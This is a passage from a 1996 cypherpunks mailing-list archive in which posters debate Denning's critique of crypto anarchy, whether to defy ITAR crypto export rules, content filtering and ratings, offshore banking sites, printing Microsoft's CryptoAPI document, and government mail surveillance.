most certainly taxed) was AFAIK implemented by the end of the 19th century.

I might be wrong on dates here; the general principle still stands...
Jon Lasser
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Sat, 27 Jan 1996 06:27:08 +0800
To: cypherpunks@toad.com
Subject: Re: Doctor Denning
In-Reply-To: <199601261807.KAA21401@netcom20.netcom.com>
Message-ID: <199601261933.LAA28110@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


> I just read the new and improved Dorothy Denning essay at
> 
>     http://www.cosc.georgetown.edu/crypto/Future.html

This can be found at
   http://www.cosc.georgetown.edu/~denning/crypto/Future.html

> One should realize, of course, that whether Crypto Anarchy
> prevails depends not upon the varied philosophical leanings of
> citizen-units May and Denning, but rather upon whether our
> mathematics is more powerful than their jackbooted thugs.

What I found interesting was the lack of meat behind
"Crypto Anarchy is Not Inevitable".  It seemed to boil
down to the vacuous "if everyone could just agree that key
escrow is a good thing, there would be no problem".

Cheers,
Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 27 Jan 1996 06:29:01 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: RANT: cypherpunks do NSA's job for them!!
In-Reply-To: <9601260028.AA12225@alpha>
Message-ID: <199601261934.LAA21926@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>Vladimir Z. Nuri writes:
> > the Tao of bad government: if you really want to get rid of a law,
> > act and think at all times as if it doesn't even exist.
>
>I accept that that's one way of going about things, but I challenge
>you to demonstrate conclusively that it is the only means to generate
>political interest in opposition to a law. 

it was not my point at all to "demonstrate conclusively" that ignoring
a law helps create opposition to a law. actually, I was not talking
about opposition to a law at all. my main point was that for a law
to work, people must *actively*support* it. by not supporting a
law, it effectively ceases to exist.

 in other words, what you consider
"opposition" to laws in fact may be playing into the hands of the NSA.
by taking the laws very seriously (such as the preposterous ideas that
bureacrats are allowed to prevent companies from even exporting software
with "hooks" in it, and effectively allowing spooks to vet every
piece of crypto code written in this supposedly free country) you
are doing NSA's "heavy lifting" *for* them.

these laws would be no problem if nobody followed them, if nobody gave
a damn about them. *opposition* in many ways is the wrong mindset.
by opposing the laws, you implicitly reveal that you believe they are
legitimate, that they are enforceable, that they are important to
conform to, etc (all the things that cpunks publicly deny). 
by ignoring them, you put your reality where your mouth is. it sounds
paradoxical, but ignoring a law is far more destructive to it
than opposing it!!

> I happen to disagree with
>this, and I refuse to accept the wacky notion that by explaining to
>somebody that what they're doing is in violation of a pointless stupid
>law, and explaining why it's only through wide exposure of that
>pointless stupidity that the law and others like it can be struck
>down, that I am unwittingly strengthening the law.  Balderdash.

"when the wise hear of the Tao, they are intrigued. when the 
skeptical hear of the Tao, they scoff. when
the stupid hear of the Tao, they laugh loudly".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 27 Jan 1996 06:14:02 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: "This post is G-Rated"
Message-ID: <199601261944.LAA27372@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:50 PM 1/26/96 -0600, Mike McNally wrote:
>Bill Frantz writes:
> > >Enforce?  Enforce?  Exsqueeze me?
> > 
> > On cypherpunks, Perry is the principle enforcer, although others frequently
> > join in.
>
>Oh, right.  I remember now.  All the off-topic junk I see on this
>list is just my imagination.  All the billions of "UNSUBSCRIBE" and
>"SIGNOFF" and "SET NO-MAIL" messages I see on the mailing lists I'm on
>are just bits of lint that slip by.

Absolutely correct.  What we don't have is general firewall discussions and
general conspiricy discussions (which are directed elsewhere).  Perry
performs a needed function.

>The "enforcement" is always a reactive thing.  I don't think you'd get
>far with a parent explaining that the material they consider indecent
>which somehow showed up on alt.kids.only would be dealt with by
>blistering flames.

Such parents would not let their children read unmoderated/unrated
newsgroups.  I think they are failing their children, but they would
certainly disagree.


>So you think those who want a "controlled cyberspace" would be happy
>with newsgroups that stay "mostly decent"?  I strongly doubt it, and I
>will also add that such "enforcement" is far, far less effective on
>newsgroups than on mailing lists.

The people who want a "controlled cyberspace" will not be happy.  I want
explore the consiquences, both technical and social, of taking the control
away from them by putting in the hands of individuals and minor children's
parents.  This approach would destroy their principle argument and make it
less likely that they will succeed.  However, unlike the motion picture
precedent, I think multiple rating agencies will not only be desirable, but
necessary.  I assume that in addition to the Christian Coalition's rating
service there would be a Hottest Pics of the Net service.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 27 Jan 1996 06:42:36 +0800
To: cypherpunks@toad.com
Subject: [rant] A thought on filters and the V-Chip
Message-ID: <2.2.32.19960126195651.008e5558@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


[Not Perry(tm) approved -- Skip of this offends you]

I am waiting for someone to come out with a product that will modify the
v-ship (or the various internet "protection" tools) in such a way that it
scans *FOR* pornography.

Porn is big business.  You would think that people would pay for a way to
sort through all of that non-smuttiness and just "get to the good stuff".  I
also imagine that as soon as such a product appears, the censors will scream
bloody murder.

The purpose of all the ratings, and the filters and all the other stuff is
not to "protect kids".  It is to protect the prejudices of the adults.  They
do not want to see it anywhere in the world, not just inflicting some sort
of imaginary harm on their children.  I expect the first people to use the
"reversed filters" will be the kids themselves.  (Behind the parents back,
of course.)

I have known too many adults that believe that by restricting their kids
access to information, they can prevent them from growing up.  In these
parent's minds, such information is what makes them want to hump their
little brains out.  Biology has nothing to do with it in their limited way
of thinking.  Cluelessness does not just cover computers with these people.
It also covers any other topic that required more than two brain cells to
understand.

But censorship alone will not solve the problems that these people see in
the world.  They are afraid that somone, somewhere, is commiting "sin".
They will do what it takes to stamp out all this immorality, no matter who
gets hurt or what it takes.

A good description of what is next is at http://www.cum.net/cnextstep.html .

You have to realize that these people are busybodies who believe that they
have the right to define what is right and what is wrong.  In order to
enforce these beliefs, they will need access to every means of communication
in existance.  Anything that prevents this enforcement will be seen as a
threat and thus must be banned.  Encryption will be one of the first things
to go.  Double entendres, sarcasm, and wordplay will be next.  Fiction
dealing with anything that would offend an eight year old (because that is
where they stopped their intelectual growth) must be stamped out as well.
More will follow as the demons appear in more and more forms.

And they will never succeed...  No matter how hard the censors have tried in
the past to outlaw "smut", it has always existed in one form or another.
All they do is drive it underground.  If they stamp out crypto, they will
just drive it underground.  And in the process they will have stamped any
freedoms you or I have underground as well...

    
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
               National Security uber alles!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 27 Jan 1996 04:51:14 +0800
To: cypherpunks@toad.com
Subject: Re: OFFSHORE RESOURCES
Message-ID: <ad2e5e4716021004efce@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:46 PM 1/26/96, Sandy Sandfort wrote:

>There has been sporadic interest on this list with regard to
>offshore incorporation, banking, etc.  While ads for offshore
>services are common in the international press, until now, none
>of these companies has an Internet presence.

???

I've been tracking offshore banks with Internet presences for more than a
year...I figure only those with Net savvy are worth looking at.

An Alta Vista query of "offshore AND banking" just revealed 2000 hits,
suggesting a lot of activity. Some of these hits are for banks, some for
services catering to offshore bankers, some are reviews of what's out
there, and some are of course just plain accidental hits. But you get the
point.

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 27 Jan 1996 07:20:03 +0800
To: blanc <blancw@accessone.com>
Subject: more RANTING about NSA-friendly cpunks
In-Reply-To: <01BAEB69.A2BB7E80@blancw.accessone.com>
Message-ID: <199601262011.MAA17408@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



BW:
>Actually, Vlad is has a remote point. =20

ah, thanks for the ringing endorsement.

>When certain activities are described as being "illegal" it lends to the =
>laws surrounding them an air of legitimacy, even though most anyone on =
>this list who refers to them in that way understands that they are =
>phrasing their words in terms of how these actions are =
>perceived/categorized by the lawmakers, not by the cpunks.

hence my advice: if one talks about these laws, at least insert the
caveat and reminder: we think they are bogus, we are waiting for
someone to challenge them, we doubt a court would uphold a ban
on export of "crypto hooks" or "signing foreign crypto code", and
at least we'd be interested in the court fight, and probably support
whoever tried.

do you see I am not asking anyone to be crucified here? I'm merely
asking cpunks to emphasize the attitudes that are actually serving
the "spread the crypto" agenda!!

>Yet you must understand, Vlad:  you aren't going to figure out how to =
>deal with a looming threat like ITAR simply by being nonchalant & =
>devil-may-care.

@#$%^&*!!! you miss the point. words like "a looming threat like the
ITAR" again play into the hands of the NSA. if you think the law
is illegitimate, use something like, "the silly bureacratese of the
ITAR" or something similar. *you* give away your own power to a law
whenever *you* believe it is a significant factor in your life. 

what is the worst that has happened to anyone from the "looming threat
of the ITAR" for illegal *crypto*export*?? a visit by the NSA men in 
black?? what are the supposed teeth that are preventing from anyone
from even challenging the algorithm sections of the ITAR??

has anyone *tried* just ignoring the ITAR wrt crypto and seeing what 
would happen? the gubbermint blindly thinks that cyberspace will 
inevitably bring the wrath of four horsemen of the infocalypse, but aren't we
equally as comic in assuming that violating the ITAR crypto sections
will inevitably bring the 4 horsemen of the NSA??

(please do NOT give me examples of how drug-dealer-x or arms-smuggler-y
got a bazillion years in prison for violating the ITAR-- obviously you
would have completely missed my point: I'm talking about the *crypto*
sections of the ITAR!!)

 I mean, what if somebody made a big show of OPENLY AND
FLAGRANTLY VIOLATING THE ITAR? *nothing* such as this has ever happened.
its exactly what we need. (I am thinking more of something on the corporate
level, not individual level). all the sheep on this list would cringe in
horror at my suggestion, but can you *prove* that something bad would
happen to you? do you really think the bogeyman is going to get you if
you do so? actions speak louder than words...

>   The fact that some people (lawyers) know what =
>corporations & individuals are facing if they try to import or export =
>"illegal" substances like abstract code, and the fact that some people =
>(programmers) discuss the issues openly, does not mean that they are =
>headed in the direction of submission to the given obstacles.  =20

you don't understand this point I have repeatedly reiterated. 
DISCUSSING THE ISSUE AMOUNTS TO SUBMISSION.  the moment that you
even THINK about the problem, the law is doing exactly what it was
*designed* to do, *succeeding* in dampening something that we supposedly
*claim* can't and shouldn't be dampened? how is it dampened? BY OURSELVES!!!

>It just means that they're thinking through the problem, to clarify just =
>what the situation is, to give conscious consideration to what anyone =
>might have to deal with as a consequence of their decisions (to do what =
>they will regardless of the NSA's perceptions).

if people actually did what they wanted "regardless of the NSA's perceptions",
then we would have exactly what we are always whining for, and that's
exactly what I'm advocating.  but in fact what everyone is doing is
paying close attention to what how the NSA would view some supposed
action, taking the NSA's opinion on the ITAR as *law* (gosh, when did
the NSA get the authority to make/interpret/enforce laws?) and backing
off from anything.

there are THREE SOLID WAYS that crypto could be spread like widfire
RIGHT NOW but I have seen them argued against by people on the list
on the basis that "the NSA wouldn't approve". well, SCREW THE NSA!!!
do you want to protect the NSA or DON'T YOU???

1. CRYPTO HOOKS into legitimate crypto software. the companies
export the software to their hearts content and challenge the government
in court if prevented.

2. SIGNING FOREIGN CODE. the fact that MS doesn't want to even sign
foreign implementations of code for fear of some supposed NSA
disapproval is atrocious spinelessness.

3. IMPORTING THE CRYPTO SOFTWARE. TCM argues that "this would quickly
be outlawed if not already illegal". oh yeah? says who? don't you think
there would be a pretty spectacular FIGHT over this?

yet I have seen cpunks endlessly argue against all these points, when
they are exactly what we have the most chance of winning, imho.
the best way, which because everyone has been successfully conditioned
to do exactly what the NSA wants:

4. JUST WRITE WHATEVER THE HELL CODE YOU WANT, AND SEND IT WHEREVER THE
HELL YOU WANT.

don't give me any *crap* about how NASTY THINGS WILL BEFALL YOU if you
do any of the above. what happened to PRZ??? NOTHING. it is possible that
PRZ may have been able to NEVER EVEN HIRE A LAWYER if he wanted to, and
emerged unscathed from the last situation. 

there is NO PRECEDENT for
anything happening to ANYONE for trying any of the above things, and
until someone tries them, DO NOT ARGUE THEY CANNOT BE DONE, or that
NASTY AND UNSPEAKABLE THINGS BEFALL THOSE WHO TRY, unless you
want to be given medals of honor by the NSA for helping them out!!
(again, I do not count "GOVERNMENT MOUNTS AN INVESTIGATION" as anything
harmful!!! please feel free to disagree with me!! perhaps if you are
a frail entity, indeed the mere idea that government agents are thinking
about you can cause you to have a nervous breakdown!!!)

I am waiting for some company with some balls to do any of this. MS, in all
their amazing marketplace aggression, apparently believes that you don't
ever fight the government. a pity. that's the most important battle.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Sat, 27 Jan 1996 02:00:48 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Enquirer
Message-ID: <2.2.32.19960126172125.006b2d88@mail.visi.net>
MIME-Version: 1.0
Content-Type: text/plain


Man, I wish I knew who was writing this!  No matter what mood I start out
in, once I've waded through the noise and get to the Enquirer, I always feel
better.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 27 Jan 1996 04:48:16 +0800
To: cypherpunks@toad.com
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <199601261641.IAA13862@mailx.best.com>
Message-ID: <199601261829.MAA03046@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> The principle that governments have no special moral rights beyond
> those of normal men leads logically to the conclusion that men
> have a natural right to engage in just retribution, provided of
> course that such retribution can be seen to be just.

It's extrememely difficult (impossible?) to come up with ideological
principles which can't be used as a logical basis for stupid, dangerous,
and even suicidal proposistions. 

That's why ideology always has to be tempered with pragmatism.  In school 
I was accused of anti-intellectualism when I made this point, and I'm 
sure someone will say that to me again, eventually.  

"There are more things under Heaven and Earth, Horatio, than are dreamt of
in your philosophy."

No matter what your political or economic theory says and how solid it
seems, you are never relieved of your duty to keep your eyes open, of
trying to evaluate in simple human terms the effects of policy on the
people around you.  This is where privacy and free speech ought to be
defended. 

Perry is right, people shouldn't be reading each other's mail, and the 
government shouldn't be able to either.  I'm not sure I could justify 
that with a rigorous logical argument built from a handful of axioms 
concerned with the nature and role of democratic government, natural law, 
or whatever else it was that John Locke was all hopped up on.  (No 
disrespect to Locke intended.)

I don't need a political theory to tell me that it's in my best interest
to have privacy, and neither do most other people.  Everyone wants privacy
-- if you don't believe me, grab a clipboard, stand on a street corner,
and ask around.  The government claims it works for us.  That's all there
is to it. 

(I was a math major my first time through school, and I was particularly 
interested in formal logical systems.  The limits of formal and 
especially pseudo-formal reasoning have always interested me -- but it 
ain't cryptography, so I'll spare you.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael G Thornton <rlwmgt@mpx.com.au>
Date: Sun, 28 Jan 1996 07:54:47 +0800
To: cypherpunks@toad.com
Subject: Unsub request delete at will
Message-ID: <3108CA8B.3191@mpx.com.au>
MIME-Version: 1.0
Content-Type: text/plain


With apoligies for posting this to the general 
list community, please unsub me from this list as 
I am having some software conflicts with unsubing 
via your server, your assistance is appreciated.

Many thanks


Regards
Michael
rlwmgt@mpx.com.au




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@isdn.net>
Date: Sat, 27 Jan 1996 05:20:53 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Microsoft's CryptoAPI - thoughts?
Message-ID: <2.2.32.19960126184329.002dbed0@isdn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:24 PM 1/26/96 GMT, John Lull wrote:
>On Fri, 26 Jan 1996 03:02:56 -0500 (EST), Futplex wrote:
>
>> Has someone here managed to extract PostScript hardcopy of the CAPI from this
>> Web page? I tried earlier this evening and wound up with a miniature 
>> ecological disaster on my hands. The page says:
>
>No problem on a LaserJet 4M.
>
>
>
>> "For ease of online reading and printing, we've provided copies of this
>> lengthy document in Microsoft Word and Postscript formats."
>
>I tried printing the Word version from WordView, also, and ran into
>major problems.  It absolutely insisted on setting the printer to
>manual feed, and when I tried to print the odd-numbered pages,
>WordView crashed complletely.
>
>> Worse still, it appears that the
>> capiapp.ps file is actually a catenation of many PostScript files (one per
>> chapter?), each beginning with a version of this ensnarling line.
>
>Maybe that's why I couldn't extract odd & even-numbered pages.
>
>
>

The odd command line in the postscript file is specific to HP laserjet's.
It is a command that tells the printer to switch to postscript mode.  The
Microsoft print drivers are bad about this.  One option is to strip all
occurances of this line from the file or load and print the file from
GhostScript, a postscript processor.

Hope this helps.

Lou Z.
Lou Zirko                                (615)851-1057
Zystems                                lzirko@isdn.net
"We're all bozos on this bus" - Nick Danger, Third Eye
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzBLJocAAAEEAMlDzYJPYq0pvfMuSiKU0Y65L2nJql+qEJHYGjO5Pys4prDw
YW1ooPWaqrPQAy/eyqrM7I9KNFDCtmaPxtgcPw2oEDfc/w6cPkrVzvovKLfHQvtg
V/hHUekptSf6j525omrVAoM9MxVL3sEGCjn9VrTeC3h9upkfntHOJeL88i2NAAUR
tB5Mb3UgWmlya28gPHppcmtvbEBkYXRhdGVrLmNvbT4=
=Qlxm
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 27 Jan 1996 06:02:04 +0800
To: cypherpunks@toad.com
Subject: Re: "This post is G-Rated"
Message-ID: <ad2e67ae19021004255a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:50 PM 1/26/96, Mike McNally wrote:

>The "enforcement" is always a reactive thing.  I don't think you'd get
>far with a parent explaining that the material they consider indecent
>which somehow showed up on alt.kids.only would be dealt with by
>blistering flames.
...
>So you think those who want a "controlled cyberspace" would be happy
>with newsgroups that stay "mostly decent"?  I strongly doubt it, and I
>will also add that such "enforcement" is far, far less effective on
>newsgroups than on mailing lists.

By the way, we should always be ready to would-be censors/moderators of
Usenet that "kid-friendly" alternatives either exist, or could be created
by those interested in screening stuff. What many of us object to is the
notion that legislators in some particular country can cause the 12,000+
Usenet groups, or the accesses via the Net and Web, to be turned into
something safe for all children, or all Muslims, or all women, or all
vegans.

AOL and its ilk are used by parents I know as a "kinder and gentler"
introduction to the Net for their impressionable ankle-biters.

There are a zillion special interest groups that want their members
protected from various kinds of stuff out there in the world. I don't have
to list them here.

We as Cypherpunks should strenuously point out that the speech of adults on
forums like Usenet should not be reduced to the level of what all children
should hear. Nor should we endorse "voluntary self-ratings" proposals, for
the many reasons discussed here recently.

I for one will not slow down my speech, slow down my postings to Usenet, by
carefully reviewing my words to see if they are offensive to children,
their parents, their grandparents, Mormons, Jews, Boy Scouts,
schizophrenics, high-strung neurotics, Muslims, animal rights advocates,
queers, Rosicrucians, persons of color, persons of no color, or persons of
poundage.

Fortunately, the technological trends strongly mitigate against the Net and
the Web ever being controlled by the censors of any one country.

"Not even speed bumps."

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Crocker <dcrocker@brandenburg.com>
Date: Sun, 28 Jan 1996 23:48:31 +0800
To: (potential attendees)
Subject: ANNOUNCEMENT: IMC Resolving Security Complexity Workshop
Message-ID: <v03004a0fad2eee2aaec7@[205.214.160.46]>
MIME-Version: 1.0
Content-Type: text/plain


These are the final arrangements:

        Resolving Email Security Complexity Workshop

            21 February 1996 * 8:30 AM - 5:00 PM
      San Jose (CA) Hilton & Towers  *  San Carlos Room
                 (next to Convention Center)

 Pre-registration & payment: $50  *  After February 16: $75
 (cash, check, wire transfer, money order, or First Virtual)

     Pass this note on to others who are deeply involved in
     email security.

                           AGENDA

The meeting will be structured with a tight agenda, having a
very focused sequence of work; it is definitely not for
general education. Some amount of review is appropriate, but
not much. The following agenda is tentative and will be
reviewed and modified on the pre-workshop discussion list.

Morning

*    Very briefly describe the MOSS, PGP, and S/MIME
     solutions
*    Review the functional and technical concerns
*    Review the extent to which each alternative satisfies
     the concerns
*    Seek consensus for concerns that qualify as
     requirements

Afternoon

*    Haggle about the strengths and weaknesses of the
     technical alternatives
*    Explore the choices and/or negotiate a preferred
     solution

                      ONLINE RESOURCES

To register for the meeting:

Web:           <http://www.imc.org/workshop-registration>
Email:         <mailto:workshop-registration@imc.org>

For discussion before and after the meeting:

Web:           <http://www.imc.org/workshop/>
Email:         <mailto:resolving-security-request@imc.org>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Sat, 27 Jan 1996 05:30:45 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: "This post is G-Rated"
In-Reply-To: <199601261839.KAA19984@netcom6.netcom.com>
Message-ID: <9601261850.AA09988@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
 > >Enforce?  Enforce?  Exsqueeze me?
 > 
 > On cypherpunks, Perry is the principle enforcer, although others frequently
 > join in.

Oh, right.  I remember now.  All the off-topic junk I see on this
list is just my imagination.  All the billions of "UNSUBSCRIBE" and
"SIGNOFF" and "SET NO-MAIL" messages I see on the mailing lists I'm on
are just bits of lint that slip by.

The "enforcement" is always a reactive thing.  I don't think you'd get
far with a parent explaining that the material they consider indecent
which somehow showed up on alt.kids.only would be dealt with by
blistering flames.

 > >And of course, it doesn't work...
 > 
 > Of course it works.  Cypherpunks stays much more on the topic than it would
 > without Perry.  Since Perry has no way of directly enforcing his opinions,
 > they can be overridden by any other posters, but his "moral suasion" does
 > have an effect on many of us.

So you think those who want a "controlled cyberspace" would be happy
with newsgroups that stay "mostly decent"?  I strongly doubt it, and I
will also add that such "enforcement" is far, far less effective on
newsgroups than on mailing lists.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jan 1996 08:19:52 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: Denning's Crypto Archy
Message-ID: <m0tfv9r-000936C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:45 AM 1/26/96 -0500, Duncan Frissell wrote:
>At 02:14 PM 1/26/96 +0100, Anonymous wrote:
>>
>>Cypherptoady's updatest unscratchable crypto itch and salve:
>>
>>
>>http://www.cosc.georgetown.edu/~denning/crypto/Future.html
>>
>>
>
>A good read.  You know you're making progress when they start to address
>your arguments.
>
>"Although May limply asserts that anarchy does not mean lawlessness and
>social disorder, the absence of government would lead to exactly these
>states of chaos."
>I've never known Tim to offer limp assertations.
>DCF


While this would normally be my cue to offer up my "Assassination Politics"
idea, which (if presumed to be correct) would stabilize "anarchy" and
prevent "lawlessness and social disorder" (at least as normally seen by the
average reader) I think that under the circumstances that would be redundant
here.

Jim Bell

Klaatu Burada Nikto
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQk/JfqHVDBboB2dAQHQJAP/aMz9v2iXudFrdiayCTNvgWP7y3u4Qr78
gDGGZt+O5ODrcZuBJTE+CuYBvuhRq/nidtIWrmkIhonBC4+ahP/ryxxLDaJ7usvK
BWXgIR5rsEIPjGQsZsH00qlaOZ8fQLeQJ710F0bTpbUuKNIkvpFrXq4vY4kgaIT+
wGLKWFizNnQ=
=LOcz
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jan 1996 08:29:29 +0800
To: perry@piermont.com
Subject: Re: "Gentlemen do not read each other's mail"
Message-ID: <m0tfvDB-00093rC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:04 AM 1/26/96 -0600, Mike Tighe wrote:
>Perry E. Metzger writes:
>
>>I am a funny sort of person. I don't believe that governments should
>>be able to do anything that individuals cannot. If it is bad for me to
>>steal, it is also bad for a government official to steal. If it is bad
>>for me to listen in on my neighbor's phone calls, it is bad for the
>>government, too.
>
>I do not see anything funny, but you are at odds with the Constitution,
>where the people have granted the government certain rights that they have
>not granted to themselves. But it seems we may be making progress at
>getting those rights ourselves.

It isn't clear to me that the Constitution grants "rights" to the government 
that aren't already possessed by the people themselves.  Would that even be 
possible?   "Powers" maybe, "rights," maybe not.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQk/8vqHVDBboB2dAQHTywP/aw9I8woDyjTIGgiUc3AB4S9bCGnRsIUo
Ggrpc6PCpeIb+irflrffSpopiTJa+PQlMJUG0eXi3Bldi6mBVNCWeW1n1dOzwM9L
lWV70S6Zw/CuRfvwH6byw01XdUbIq6egiVTis6/QVo727Q1k03nqeXdmnRo+lt9Q
YAHdaDYWVZM=
=a6qT
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 27 Jan 1996 03:58:16 +0800
To: cypherpunks@toad.com
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <199601252139.QAA16761@jekyll.piermont.com>
Message-ID: <9601261803.AA04117@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes,

>I am a funny sort of person. I don't believe that governments should
>be able to do anything that individuals cannot. If it is bad for me to
>steal, it is also bad for a government official to steal. If it is bad
>for me to listen in on my neighbor's phone calls, it is bad for the
>government, too.

This statement commits the logical falacy of type incompatibility. Sets of 
objects are not the same as objects. Organisations of people have different 
characteristics to people. To accord the same rights to idividuals is to ignore 
the different chaqracteristics of the organisation over the group. In most cases 
we would ascribe fewer individual liberties to groups than to individuals. The 
individual may have freedom of speech but the government official does not. It 
is generally undesirable for military personel to enter into party politics, 
thus it is generally undesirable for such people to take part in party political 
broadcasts.

On the other hand there are casses in which we would wish to give the government 
more power than the individual. We give the government the right to raise 
taxation for example.

Thus Perry is not only a funny sort of person, he is also entirely negating the 
argument that Mill puts forward in "on Liberty", namely that the interests of 
the government and people are not as opposed as might appear, that it is 
possible to divide liberties into those which the state must excercise in order 
to protect the liberty of the population in general and those which the 
individual needs to protect themselves from government and other interference.

If we take Perry's argument seriously we effectively deny the legitimacy of any 
government. This is not good for Perry's argument for it is clearly legitamate 
to read the mail of a party which is illegitamte [an evil oppressor of the 
people, restraint on the exploitation of ecconomic power, restraint on free 
capitalism, tool of the borgeoise classes, people of all lands untie! you have 
nothing to lose but your chains...]


		Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 27 Jan 1996 03:47:49 +0800
To: hallam@w3.org
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <9601261803.AA04117@zorch.w3.org>
Message-ID: <199601261805.NAA24009@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



As previously noted, we've drifted off charter, so I will answer in
private mail.

.pm

hallam@w3.org writes:
> Perry writes,
> 
> >I am a funny sort of person. I don't believe that governments should
> >be able to do anything that individuals cannot. If it is bad for me to
> >steal, it is also bad for a government official to steal. If it is bad
> >for me to listen in on my neighbor's phone calls, it is bad for the
> >government, too.
> 
> This statement commits the logical falacy of type incompatibility. Sets of 
> objects are not the same as objects. Organisations of people have different 
> characteristics to people. To accord the same rights to idividuals is to igno
re 
> the different chaqracteristics of the organisation over the group. In most ca
ses 
> we would ascribe fewer individual liberties to groups than to individuals. Th
e 
> individual may have freedom of speech but the government official does not. I
t 
> is generally undesirable for military personel to enter into party politics, 
> thus it is generally undesirable for such people to take part in party politi
cal 
> broadcasts.
> 
> On the other hand there are casses in which we would wish to give the governm
ent 
> more power than the individual. We give the government the right to raise 
> taxation for example.
> 
> Thus Perry is not only a funny sort of person, he is also entirely negating t
he 
> argument that Mill puts forward in "on Liberty", namely that the interests of
 
> the government and people are not as opposed as might appear, that it is 
> possible to divide liberties into those which the state must excercise in ord
er 
> to protect the liberty of the population in general and those which the 
> individual needs to protect themselves from government and other interference




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
